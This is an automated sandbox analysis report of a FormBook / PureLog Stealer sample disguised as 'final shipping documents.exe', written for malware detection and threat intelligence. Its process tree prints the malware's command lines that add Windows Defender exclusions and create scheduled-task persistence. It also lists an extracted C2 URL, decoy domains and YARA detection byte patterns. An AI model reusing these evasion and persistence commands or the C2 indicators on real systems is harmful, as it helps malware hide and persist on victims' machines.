Edit tour

Windows Analysis Report
final shipping documents.exe

Overview

General Information

Sample name:	final shipping documents.exe
Analysis ID:	1590890
MD5:	ad5806ffe238ea11606d3ee49b28c655
SHA1:	953393b81ec159e23c16459681820317f2f63d18
SHA256:	31e7559f21054aca8a1cd2287e322f22e03ac6cbc84e1265c8ac1a3367403989
Tags:	exeuser-James_inthe_box
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Query firmware table information (likely to detect VMs)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Uses netstat to query active network connections and open ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to detect virtual machines (SGDT)

Contains functionality to detect virtual machines (SMSW)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

final shipping documents.exe (PID: 3628 cmdline: "C:\Users\user\Desktop\final shipping documents.exe" MD5: AD5806FFE238EA11606D3EE49B28C655)

powershell.exe (PID: 4944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4656 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1032 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 6156 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

mstsc.exe (PID: 7468 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)

cmd.exe (PID: 7532 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 8156 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

NETSTAT.EXE (PID: 7592 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)

WerFault.exe (PID: 8104 cmdline: C:\Windows\system32\WerFault.exe -u -p 4056 -s 6976 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

GcrdXwPgmZ.exe (PID: 6664 cmdline: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe MD5: AD5806FFE238EA11606D3EE49B28C655)

schtasks.exe (PID: 7392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.enelog.xyz/a03d/"], "decoy": ["nfluencer-marketing-13524.bond", "cebepu.info", "lphatechblog.xyz", "haoyun.website", "itiz.xyz", "orld-visa-center.online", "si.art", "alata.xyz", "mmarketing.xyz", "elnqdjc.shop", "ensentoto.cloud", "voyagu.info", "onvert.today", "1fuli9902.shop", "otelhafnia.info", "rumpchiefofstaff.store", "urvivalflashlights.shop", "0090.pizza", "ings-hu-13.today", "oliticalpatriot.net", "5970.pizza", "arimatch-in.legal", "eepvid.xyz", "bfootball.net", "otorcycle-loans-19502.bond", "nline-advertising-34790.bond", "behm.info", "aportsystems.store", "agiararoma.net", "agfov4u.xyz", "9769.mobi", "ome-renovation-86342.bond", "kkkk.shop", "duxrib.xyz", "xurobo.info", "leurdivin.online", "ive-neurozoom.store", "ndogaming.online", "dj1.lat", "yselection.xyz", "52628.xyz", "lsaadmart.store", "oftware-download-92806.bond", "avid-hildebrand.info", "orashrine.store", "erpangina-treatment-views.sbs", "ategorie-polecane-831.buzz", "oonlightshadow.shop", "istromarmitaria.online", "gmgslzdc.sbs", "asglobalaz.shop", "locarry.store", "eleefmestreech.online", "inggraphic.pro", "atidiri.fun", "olourclubbet.shop", "eatbox.store", "romatografia.online", "encortex.beauty", "8oosnny.xyz", "72266.vip", "aja168e.live", "fath.shop", "argloscaremedia.info"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x81f11:$a1: 3C 30 50 4F 53 54 74 09 40 0xaf331:$a1: 3C 30 50 4F 53 54 74 09 40 0x98840:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc5c60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8667f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb3a9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x91567:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xbe987:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x855c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85832:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb29e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb2c52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x91365:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xbe785:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x90e51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xbe271:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x91467:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xbe887:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x915df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbe9ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8624a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xb366a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x900cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbd4ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x86f43:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb4363:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x975a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xc49c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x985aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x944c9:$sqlite3step: 68 34 1C 7B E1 0x945dc:$sqlite3step: 68 34 1C 7B E1 0xc18e9:$sqlite3step: 68 34 1C 7B E1 0xc19fc:$sqlite3step: 68 34 1C 7B E1 0x944f8:$sqlite3text: 68 38 2A 90 C5 0x9461d:$sqlite3text: 68 38 2A 90 C5 0xc1918:$sqlite3text: 68 38 2A 90 C5 0xc1a3d:$sqlite3text: 68 38 2A 90 C5 0x9450b:$sqlite3blob: 68 53 D8 7F 8C 0x94633:$sqlite3blob: 68 53 D8 7F 8C 0xc192b:$sqlite3blob: 68 53 D8 7F 8C 0xc1a53:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1508959820.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6e79:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7a8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb5e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x164cf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa530:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa79a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x162cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15db9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x163cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16547:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb1b2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15034:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbeab:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c50f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d512:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19431:$sqlite3step: 68 34 1C 7B E1 0x19544:$sqlite3step: 68 34 1C 7B E1 0x19460:$sqlite3text: 68 38 2A 90 C5 0x19585:$sqlite3text: 68 38 2A 90 C5 0x19473:$sqlite3blob: 68 53 D8 7F 8C 0x1959b:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.1567368332.0000000002A77000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7029:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d958:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb797:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1667f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa6e0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa94a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1647d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15f69:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1657f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x166f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb362:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x151e4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xc05b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c6bf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d6c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x195e1:$sqlite3step: 68 34 1C 7B E1 0x196f4:$sqlite3step: 68 34 1C 7B E1 0x19610:$sqlite3text: 68 38 2A 90 C5 0x19735:$sqlite3text: 68 38 2A 90 C5 0x19623:$sqlite3blob: 68 53 D8 7F 8C 0x1974b:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1504736152.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: final shipping documents.exe PID: 3628	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: final shipping documents.exe PID: 3628	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x13e7f:$a1: 3C 30 50 4F 53 54 74 09 40 0x8555f:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: MSBuild.exe PID: 6156	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xfd:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: GcrdXwPgmZ.exe PID: 6664	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
